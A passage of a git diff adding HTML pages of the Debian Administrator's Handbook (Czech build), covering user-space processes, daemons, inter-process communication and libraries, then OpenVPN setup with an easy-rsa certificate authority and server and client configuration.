+        href="backcover.html"
+        title="Příloha C. The Debian Administrator's Handbook" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.user-space.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-role-and-tasks.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="backcover.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.user-space"></a>B.5. The User Space</h2></div></div></div><a
+          id="id-1.21.8.2"
+          class="indexterm"></a><a
+          id="id-1.21.8.3"
+          class="indexterm"></a><div
+          class="para">
+			“User space” refers to the runtime environment of normal (as opposed to kernel) processes. This does not necessarily mean these processes are actually started by users because a standard system normally has several “daemon” (or background) processes running before the user even opens a session. Daemon processes are also considered user-space processes.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.process-basics"></a>B.5.1. Process</h3></div></div></div><a
+            id="id-1.21.8.5.2"
+            class="indexterm"></a><div
+            class="para">
+				When the kernel gets past its initialization phase, it starts the very first process, <code
+              class="command">init</code>. Process #1 alone is very rarely useful by itself, and Unix-like systems run with many additional processes.
+			</div><a
+            id="id-1.21.8.5.4"
+            class="indexterm"></a><div
+            class="para">
+				First of all, a process can clone itself (this is known as a <span
+              class="emphasis"><em>fork</em></span>). The kernel allocates a new (but identical) process memory space, and another process to use it. At this time, the only difference between these two processes is their <span
+              class="emphasis"><em>pid</em></span>. The new process is usually called a child process, and the original process whose <span
+              class="emphasis"><em>pid</em></span> doesn't change, is called the parent process.
+			</div><div
+            class="para">
+				Sometimes, the child process continues to lead its own life independently from its parent, with its own data copied from the parent process. In many cases, though, this child process executes another program. With a few exceptions, its memory is simply replaced by that of the new program, and execution of this new program begins. This is the mechanism used by the init process (with process number 1) to start additional services and execute the whole startup sequence. At some point, one process among <code
+              class="command">init</code>'s offspring starts a graphical interface for users to log in to (the actual sequence of events is described in more details in <a
+              class="xref"
+              href="unix-services.html#sect.system-boot">9.1 – „System Boot“</a>).
+			</div><div
+            class="para">
+				When a process finishes the task for which it was started, it terminates. The kernel then recovers the memory assigned to this process, and stops giving it slices of running time. The parent process is told about its child process being terminated, which allows a process to wait for the completion of a task it delegated to a child process. This behavior is plainly visible in command-line interpreters (known as <span
+              class="emphasis"><em>shells</em></span>). When a command is typed into a shell, the prompt only comes back when the execution of the command is over. Most shells allow for running the command in the background, it is a simple matter of adding an <strong
+              class="userinput"><code>&amp;</code></strong> to the end of the command. The prompt is displayed again right away, which can lead to problems if the command needs to display data of its own.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.daemons"></a>B.5.2. Daemons</h3></div></div></div><a
+            id="id-1.21.8.6.2"
+            class="indexterm"></a><a
+            id="id-1.21.8.6.3"
+            class="indexterm"></a><div
+            class="para">
+				A “daemon” is a process started automatically by the boot sequence. It keeps running (in the background) to perform maintenance tasks or provide services to other processes. This “background task” is actually arbitrary, and does not match anything particular from the system's point of view. They are simply processes, quite similar to other processes, which run in turn when their time slice comes. The distinction is only in the human language: a process that runs with no interaction with a user (in particular, without any graphical interface) is said to be running “in the background” or “as a daemon”.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Daemon, demon, a derogatory term?</strong></p></div></div></div><div
+              class="para">
+				Although <span
+                class="emphasis"><em>daemon</em></span> term shares its Greek etymology with <span
+                class="emphasis"><em>demon</em></span>, the former does not imply diabolical evil, instead, it should be understood as a kind of helper spirit. This distinction is subtle enough in English; it is even worse in other languages where the same word is used for both meanings.
+			</div></div><div
+            class="para">
+				Several such daemons are described in detail in <a
+              class="xref"
+              href="unix-services.html">9 – „<em>Unix Services</em>“</a>.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ipc"></a>B.5.3. Inter-Process Communications</h3></div></div></div><a
+            id="id-1.21.8.7.2"
+            class="indexterm"></a><a
+            id="id-1.21.8.7.3"
+            class="indexterm"></a><div
+            class="para">
+				An isolated process, whether a daemon or an interactive application, is rarely useful on its own, which is why there are several methods allowing separate processes to communicate together, either to exchange data or to control one another. The generic term referring to this is <span
+              class="emphasis"><em>inter-process communication</em></span>, or IPC for short.
+			</div><div
+            class="para">
+				The simplest IPC system is to use files. The process that wishes to send data writes it into a file (with a name known in advance), while the recipient only has to open the file and read its contents.
+			</div><a
+            id="id-1.21.8.7.6"
+            class="indexterm"></a><div
+            class="para">
+				In the case where you do not wish to store data on disk, you can use a <span
+              class="emphasis"><em>pipe</em></span>, which is simply an object with two ends; bytes written in one end are readable at the other. If the ends are controlled by separate processes, this leads to a simple and convenient inter-process communication channel. Pipes can be classified into two categories: named pipes, and anonymous pipes. A named pipe is represented by an entry on the filesystem (although the transmitted data is not stored there), so both processes can open it independently if the location of the named pipe is known beforehand. In cases where the communicating processes are related (for instance, a parent and its child process), the parent process can also create an anonymous pipe before forking, and the child inherits it. Both processes will then be able to exchange data through the pipe without needing the filesystem.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> A concrete example</strong></p></div></div></div><div
+              class="para">
+				Let's describe in some detail what happens when a complex command (a <span
+                class="emphasis"><em>pipeline</em></span>) is run from a shell. We assume we have a <code
+                class="command">bash</code> process (the standard user shell on Debian), with <span
+                class="emphasis"><em>pid</em></span> 4374; into this shell, we type the command: <code
+                class="command">ls | sort</code> .
+			</div><div
+              class="para">
+				The shell first interprets the command typed in. In our case, it understands there are two programs (<code
+                class="command">ls</code> and <code
+                class="command">sort</code>), with a data stream flowing from one to the other (denoted by the <strong
+                class="userinput"><code>|</code></strong> character, known as <span
+                class="emphasis"><em>pipe</em></span>). <code
+                class="command">bash</code> first creates an unnamed pipe (which initially exists only within the <code
+                class="command">bash</code> process itself).
+			</div><div
+              class="para">
+				Then the shell clones itself; this leads to a new <code
+                class="command">bash</code> process, with <span
+                class="emphasis"><em>pid</em></span> #4521 (<span
+                class="emphasis"><em>pids</em></span> are abstract numbers, and generally have no particular meaning). Process #4521 inherits the pipe, which means it is able to write in its “input” side; <code
+                class="command">bash</code> redirects its standard output stream to this pipe's input. Then it executes (and replaces itself with) the <code
+                class="command">ls</code> program, which lists the contents of the current directory. Since <code
+                class="command">ls</code> writes on its standard output, and this output has previously been redirected, the results are effectively sent into the pipe.
+			</div><div
+              class="para">
+				A similar operation happens for the second command: <code
+                class="command">bash</code> clones itself again, leading to a new <code
+                class="command">bash</code> process with pid #4522. Since it is also a child process of #4374, it also inherits the pipe; <code
+                class="command">bash</code> then connects its standard input to the pipe output, then executes (and replaces itself with) the <code
+                class="command">sort</code> command, which sorts its input and displays the results.
+			</div><div
+              class="para">
+				All the pieces of the puzzle are now set up: <code
+                class="command">ls</code> reads the current directory and writes the list of files into the pipe; <code
+                class="command">sort</code> reads this list, sorts it alphabetically, and displays the results. Processes numbers #4521 and #4522 then terminate, and #4374 (which was waiting for them during the operation), resumes control and displays the prompt to allow the user to type in a new command.
+			</div></div><div
+            class="para">
+				Not all inter-process communications are used to move data around, though. In many situations, the only information that needs to be transmitted are control messages such as “pause execution” or “resume execution”. Unix (and Linux) provides a mechanism known as <span
+              class="emphasis"><em>signals</em></span>, through which a process can simply send a specific signal (chosen from a predefined list of signals) to another process. The only requirement is to know the <span
+              class="emphasis"><em>pid</em></span> of the target.
+			</div><div
+            class="para">
+				For more complex communications, there are also mechanisms allowing a process to open access, or share, part of its allocated memory to other processes. Memory now shared between them can be used to move data between the processes.
+			</div><div
+            class="para">
+				Finally, network connections can also help processes communicate; these processes can even be running on different computers, possibly thousands of kilometers apart.
+			</div><div
+            class="para">
+				It is quite standard for a typical Unix-like system to make use of all these mechanisms to various degrees.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.libraries"></a>B.5.4. Libraries</h3></div></div></div><a
+            id="id-1.21.8.8.2"
+            class="indexterm"></a><div
+            class="para">
+				Function libraries play a crucial role in a Unix-like operating system. They are not proper programs, since they cannot be executed on their own, but collections of code fragments that can be used by standard programs. Among the common libraries, you can find:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						the standard C library (<span
+                    class="emphasis"><em>glibc</em></span>), which contains basic functions such as ones to open files or network connections, and others facilitating interactions with the kernel;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						graphical toolkits, such as Gtk+ and Qt, allowing many programs to reuse the graphical objects they provide;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the <span
+                    class="emphasis"><em>libpng</em></span> library, that allows loading, interpreting and saving images in the PNG format.
+					</div></li></ul></div><div
+            class="para">
+				Thanks to those libraries, applications can reuse existing code. Application development is simplified since many applications can reuse the same functions. With libraries often developed by different persons, the global development of the system is closer to Unix's historical philosophy.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> The Unix Way: one thing at a time</strong></p></div></div></div><div
+              class="para">
+				One of the fundamental concepts that underlies the Unix family of operating systems is that each tool should only do one thing, and do it well; applications can then reuse these tools to build more advanced logic on top. This philosophy can be seen in many incarnations. Shell scripts may be the best example: they assemble complex sequences of very simple tools (such as <code
+                class="command">grep</code>, <code
+                class="command">wc</code>, <code
+                class="command">sort</code>, <code
+                class="command">uniq</code> and so on). Another implementation of this philosophy can be seen in code libraries: the <span
+                class="emphasis"><em>libpng</em></span> library allows reading and writing PNG images, with different options and in different ways, but it does only that; no question of including functions that display or edit images.
+			</div></div><div
+            class="para">
+				Moreover, these libraries are often referred to as “shared libraries”, since the kernel is able to only load them into memory once, even if several processes use the same library at the same time. This allows saving memory, when compared with the opposite (hypothetical) situation where the code for a library would be loaded as many times as there are processes using it.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-role-and-tasks.html"><strong>Předcházející</strong>B.4. Some Tasks Handled by the Kernel</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="backcover.html"><strong>Další</strong>Příloha C. The Debian Administrator's Handbook</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.virtual-private-network.html b/tmp/cs-CZ/html/sect.virtual-private-network.html
new file mode 100644
index 000000000..3935cc07f
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.virtual-private-network.html
@@ -0,0 +1,783 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.2. Virtual Private Network</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="next"
+        href="sect.quality-of-service.html"
+        title="10.3. Quality of Service" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.virtual-private-network.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-infrastructure.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.quality-of-service.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.virtual-private-network"></a>10.2. Virtual Private Network</h2></div></div></div><div
+          class="para">
+			A <span
+            class="emphasis"><em>Virtual Private Network</em></span> (VPN for short) is a way to link two different local networks through the Internet by way of a tunnel; the tunnel is usually encrypted for confidentiality. VPNs are often used to integrate a remote machine within a company's local network.
+		</div><a
+          id="id-1.13.5.3"
+          class="indexterm"></a><a
+          id="id-1.13.5.4"
+          class="indexterm"></a><a
+          id="id-1.13.5.5"
+          class="indexterm"></a><div
+          class="para">
+			Several tools provide this. OpenVPN is an efficient solution, easy to deploy and maintain, based on SSL/TLS. Another possibility is using IPsec to encrypt IP traffic between two machines; this encryption is transparent, which means that applications running on these hosts need not be modified to take the VPN into account. SSH can also be used to provide a VPN, in addition to its more conventional features. Finally, a VPN can be established using Microsoft's PPTP protocol. Other solutions exist, but are beyond the focus of this book.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.openvpn"></a>10.2.1. OpenVPN</h3></div></div></div><a
+            id="id-1.13.5.7.2"
+            class="indexterm"></a><div
+            class="para">
+				OpenVPN is a piece of software dedicated to creating virtual private networks. Its setup involves creating virtual network interfaces on the VPN server and on the client(s); both <code
+              class="literal">tun</code> (for IP-level tunnels) and <code
+              class="literal">tap</code> (for Ethernet-level tunnels) interfaces are supported. In practice, <code
+              class="literal">tun</code> interfaces will most often be used except when the VPN clients are meant to be integrated into the server's local network by way of an Ethernet bridge.
+			</div><div
+            class="para">
+				OpenVPN relies on OpenSSL for all the SSL/TLS cryptography and associated features (confidentiality, authentication, integrity, non-repudiation). It can be configured either with a shared private key or using X.509 certificates based on a public key infrastructure. The latter configuration is strongly preferred since it allows greater flexibility when faced with a growing number of roaming users accessing the VPN.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> SSL and TLS</strong></p></div></div></div><a
+              id="id-1.13.5.7.5.2"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.5.3"
+              class="indexterm"></a><div
+              class="para">
+				The SSL protocol (<span
+                class="emphasis"><em>Secure Socket Layer</em></span>) was invented by Netscape to secure connections to web servers. It was later standardized by IETF under the acronym TLS (<span
+                class="emphasis"><em>Transport Layer Security</em></span>). Since then TLS continued to evolve and nowadays SSL is deprecated due to multiple design flaws that have been discovered.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.easy-rsa"></a>10.2.1.1. Public Key Infrastructure: <span
+                      class="emphasis"><em>easy-rsa</em></span></h4></div></div></div><a
+              id="id-1.13.5.7.6.2"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.3"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.4"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.5"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.6"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.7"
+              class="indexterm"></a><a
+              id="id-1.13.5.7.6.8"
+              class="indexterm"></a><div
+              class="para">
+					The RSA algorithm is widely used in public-key cryptography. It involves a “key pair”, comprised of a private and a public key. The two keys are closely linked to each other, and their mathematical properties are such that a message encrypted with the public key can only be decrypted by someone knowing the private key, which ensures confidentiality. In the opposite direction, a message encrypted with the private key can be decrypted by anyone knowing the public key, which allows authenticating the origin of a message since only someone with access to the private key could generate it. When associated with a digital hash function (MD5, SHA1, or a more recent variant), this leads to a signature mechanism that can be applied to any message.
+				</div><div
+              class="para">
+					However, anyone can create a key pair, store any identity on it, and pretend to be the identity of their choice. One solution involves the concept of a <span
+                class="emphasis"><em>Certification Authority</em></span> (CA), formalized by the X.509 standard. This term covers an entity that holds a trusted key pair known as a <span
+                class="emphasis"><em>root certificate</em></span>. This certificate is only used to sign other certificates (key pairs), after proper steps have been undertaken to check the identity stored on the key pair. Applications using X.509 can then check the certificates presented to them, if they know about the trusted root certificates.
+				</div><div
+              class="para">
+					OpenVPN follows this rule. Since public CAs only emit certificates in exchange for a (hefty) fee, it is also possible to create a private certification authority within the company. The <span
+                class="pkg pkg">easy-rsa</span> package provides tools to serve as an X.509 certification infrastructure, implemented as a set of scripts using the <code
+                class="command">openssl</code> command.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> <span
+                          class="emphasis"><em>easy-rsa</em></span> before <span
+                          class="distribution distribution">Jessie</span></strong></p></div></div></div><div
+                class="para">
+					In versions of Debian up to <span
+                  class="distribution distribution">Wheezy</span>, <span
+                  class="emphasis"><em>easy-rsa</em></span> was distributed as part of the <span
+                  class="pkg pkg">openvpn</span> package, and its scripts were to be found under <code
+                  class="filename">/usr/share/doc/openvpn/examples/easy-rsa/2.0/</code>. Setting up a CA involved copying that directory, instead of using the <code
+                  class="command">make-cadir</code> command as documented here.
+				</div></div><div
+              class="para">
+					The Falcot Corp administrators use this tool to create the required certificates, both for the server and the clients. This allows the configuration of all clients to be similar since they will only have to be set up so as to trust certificates coming from Falcot's local CA. This CA is the first certificate to create; to this end, the administrators set up a directory with the files required for the CA in an appropriate location, preferably on a machine not connected to the network in order to mitigate the risk of the CA's private key being stolen.
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>make-cadir pki-falcot
+</code></strong><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>cd pki-falcot</code></strong></pre><div
+              class="para">
+					They then store the required parameters into the <code
+                class="filename">vars</code> file, especially those named with a <code
+                class="literal">KEY_</code> prefix; these variables are then integrated into the environment:
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>vim vars
+</code></strong><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>grep KEY_ vars
+</code></strong><code
+                class="computeroutput">export KEY_CONFIG=`$EASY_RSA/whichopensslcnf $EASY_RSA`
+export KEY_DIR="$EASY_RSA/keys"
+echo NOTE: If you run ./clean-all, I will be doing a rm -rf on $KEY_DIR
+export KEY_SIZE=2048
+export KEY_EXPIRE=3650
+export KEY_COUNTRY="FR"
+export KEY_PROVINCE="Loire"
+export KEY_CITY="Saint-Étienne"
+export KEY_ORG="Falcot Corp"
+export KEY_EMAIL="admin@falcot.com"
+export KEY_OU="Certificate authority"
+export KEY_NAME="Certificate authority for Falcot Corp"
+# If you'd like to sign all keys with the same Common Name, uncomment the KEY_CN export below
+# export KEY_CN="CommonName"
+$ </code><strong
+                class="userinput"><code>. ./vars
+</code></strong><code
+                class="computeroutput">NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/roland/pki-falcot/keys
+$ </code><strong
+                class="userinput"><code>./clean-all
+</code></strong></pre><div
+              class="para">
+					The next step is the creation of the CA's key pair itself (the two parts of the key pair will be stored under <code
+                class="filename">keys/ca.crt</code> and <code
+                class="filename">keys/ca.key</code> during this step):
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>./build-ca</code></strong>
+<code
+                class="computeroutput">Generating a 2048 bit RSA private key
+...................................................................+++
+...+++
+writing new private key to 'ca.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [Falcot Corp CA]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+</code></pre><div
+              class="para">
+					The certificate for the VPN server can now be created, as well as the Diffie-Hellman parameters required for the server side of an SSL/TLS connection. The VPN server is identified by its DNS name <code
+                class="literal">vpn.falcot.com</code>; this name is re-used for the generated key files (<code
+                class="filename">keys/vpn.falcot.com.crt</code> for the public certificate, <code
+                class="filename">keys/vpn.falcot.com.key</code> for the private key):
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>./build-key-server vpn.falcot.com
+</code></strong><code
+                class="computeroutput">Generating a 2048 bit RSA private key
+.....................................................................................................................+++
+...........+++
+writing new private key to 'vpn.falcot.com.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [vpn.falcot.com]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+
+Please enter the following 'extra' attributes
+to be sent with your certificate request
+A challenge password []:
+An optional company name []:
+Using configuration from /home/roland/pki-falcot/openssl-1.0.0.cnf
+Check that the request matches the signature
+Signature ok
+The Subject's Distinguished Name is as follows
+countryName           :PRINTABLE:'FR'
+stateOrProvinceName   :PRINTABLE:'Loire'
+localityName          :T61STRING:'Saint-\0xFFFFFFC3\0xFFFFFF89tienne'
+organizationName      :PRINTABLE:'Falcot Corp'
+organizationalUnitName:PRINTABLE:'Certificate authority'
+commonName            :PRINTABLE:'vpn.falcot.com'
+name                  :PRINTABLE:'Certificate authority for Falcot Corp'
+emailAddress          :IA5STRING:'admin@falcot.com'
+Certificate is to be certified until Mar  6 14:54:56 2025 GMT (3650 days)
+Sign the certificate? [y/n]:</code><strong
+                class="userinput"><code>y
+</code></strong><code
+                class="computeroutput">
+
+1 out of 1 certificate requests certified, commit? [y/n]</code><strong
+                class="userinput"><code>y
+</code></strong><code
+                class="computeroutput">Write out database with 1 new entries
+Data Base Updated
+$ </code><strong
+                class="userinput"><code>./build-dh
+</code></strong><code
+                class="computeroutput">Generating DH parameters, 2048 bit long safe prime, generator 2
+This is going to take a long time
+[…]
+</code></pre><div
+              class="para">
+					The following step creates certificates for the VPN clients; one certificate is required for each computer or person allowed to use the VPN:
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>./build-key JoeSmith
+</code></strong><code
+                class="computeroutput">Generating a 2048 bit RSA private key
+................................+++
+..............................................+++
+writing new private key to 'JoeSmith.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:</code><strong
+                class="userinput"><code>Development unit
+</code></strong><code
+                class="computeroutput">Common Name (eg, your name or your server's hostname) [JoeSmith]:</code><strong
+                class="userinput"><code>Joe Smith
+</code></strong><code
+                class="computeroutput">[…]</code></pre><div
+              class="para">
+					Now all certificates have been created, they need to be copied where appropriate: the root certificate's public key (<code
+                class="filename">keys/ca.crt</code>) will be stored on all machines (both server and clients) as <code
+                class="filename">/etc/ssl/certs/Falcot_CA.crt</code>. The server's certificate is installed only on the server (<code
+                class="filename">keys/vpn.falcot.com.crt</code> goes to <code
+                class="filename">/etc/ssl/vpn.falcot.com.crt</code>, and <code
+                class="filename">keys/vpn.falcot.com.key</code> goes to <code
+                class="filename">/etc/ssl/private/vpn.falcot.com.key</code> with restricted permissions so that only the administrator can read it), with the corresponding Diffie-Hellman parameters (<code
+                class="filename">keys/dh2048.pem</code>) installed to <code
+                class="filename">/etc/openvpn/dh2048.pem</code>. Client certificates are installed on the corresponding VPN client in a similar fashion.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.13.5.7.7"></a>10.2.1.2. Configuring the OpenVPN Server</h4></div></div></div><div
+              class="para">
+					By default, the OpenVPN initialization script tries starting all virtual private networks defined in <code
+                class="filename">/etc/openvpn/*.conf</code>. Setting up a VPN server is therefore a matter of storing a corresponding configuration file in this directory. A good starting point is <code
+                class="filename">/usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz</code>, which leads to a rather standard server. Of course, some parameters need to be adapted: <code
+                class="literal">ca</code>, <code
+                class="literal">cert</code>, <code
+                class="literal">key</code> and <code
+                class="literal">dh</code> need to describe the selected locations (respectively, <code
+                class="literal">/etc/ssl/certs/Falcot_CA.crt</code>, <code
+                class="literal">/etc/ssl/vpn.falcot.com.crt</code>, <code
+                class="literal">/etc/ssl/private/vpn.falcot.com.key</code> and <code
+                class="literal">/etc/openvpn/dh2048.pem</code>). The <code
+                class="literal">server 10.8.0.0 255.255.255.0</code> directive defines the subnet to be used by the VPN; the server uses the first IP address in that range (<code
+                class="literal">10.8.0.1</code>) and the rest of the addresses are allocated to clients.
+				</div><div
+              class="para">
+					With this configuration, starting OpenVPN creates the virtual network interface, usually under the <code
+                class="literal">tun0</code> name. However, firewalls are often configured at the same time as the real network interfaces, which happens before OpenVPN starts. Good practice therefore recommends creating a persistent virtual network interface, and configuring OpenVPN to use this pre-existing interface. This further allows choosing the name for this interface. To this end, <code
+                class="command">openvpn --mktun --dev vpn --dev-type tun</code> creates a virtual network interface named <code
+                class="literal">vpn</code> with type <code
+                class="literal">tun</code>; this command can easily be integrated in the firewall configuration script, or in an <code
+                class="literal">up</code> directive of the <code
+                class="filename">/etc/network/interfaces</code> file. The OpenVPN configuration file must also be updated accordingly, with the <code
+                class="literal">dev vpn</code> and <code
+                class="literal">dev-type tun</code> directives.
+				</div><div
+              class="para">
+					Barring further action, VPN clients can only access the VPN server itself by way of the <code
+                class="literal">10.8.0.1</code> address. Granting the clients access to the local network (192.168.0.0/24), requires adding a <code
+                class="literal">push route 192.168.0.0 255.255.255.0</code> directive to the OpenVPN configuration so that VPN clients automatically get a network route telling them that this network is reachable by way of the VPN. Furthermore, machines on the local network also need to be informed that the route to the VPN goes through the VPN server (this automatically works when the VPN server is installed on the gateway). Alternatively, the VPN server can be configured to perform IP masquerading so that connections coming from VPN clients appear as if they are coming from the VPN server instead (see <a
+                class="xref"
+                href="network-infrastructure.html#sect.gateway">10.1 – „Gateway“</a>).
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.13.5.7.8"></a>10.2.1.3. Configuring the OpenVPN Client</h4></div></div></div><div
+              class="para">
+					Setting up an OpenVPN client also requires creating a configuration file in <code
+                class="filename">/etc/openvpn/</code>. A standard configuration can be obtained by using <code
+                class="filename">/usr/share/doc/openvpn/examples/sample-config-files/client.conf</code> as a starting point. The <code
+                class="literal">remote vpn.falcot.com 1194</code> directive describes the address and port of the OpenVPN server; the <code
+                class="literal">ca</code>, <code
+                class="literal">cert</code> and <code
+                class="literal">key</code> also need to be adapted to describe the locations of the key files.
+				</div><div
+              class="para">
+					If the VPN should not be started automatically on boot, set the <code
+                class="literal">AUTOSTART</code> directive to <code
+                class="literal">none</code> in the <code
+                class="filename">/etc/default/openvpn</code> file. Starting or stopping a given VPN connection is always possible with the commands <code
+                class="command">service openvpn@<em
+                  class="replaceable">name</em> start</code> and <code
+                class="command">service openvpn@<em
+                  class="replaceable">name</em> stop</code> (where the connection <em
+                class="replaceable">name</em> matches the one defined in <code
+                class="filename">/etc/openvpn/<em
+                  class="replaceable">name</em>.conf</code>).
+				</div><div
+              class="para">
+					The <span
+                class="pkg pkg">network-manager-openvpn-gnome</span> package contains an extension to Network Manager (see <a
+                class="xref"
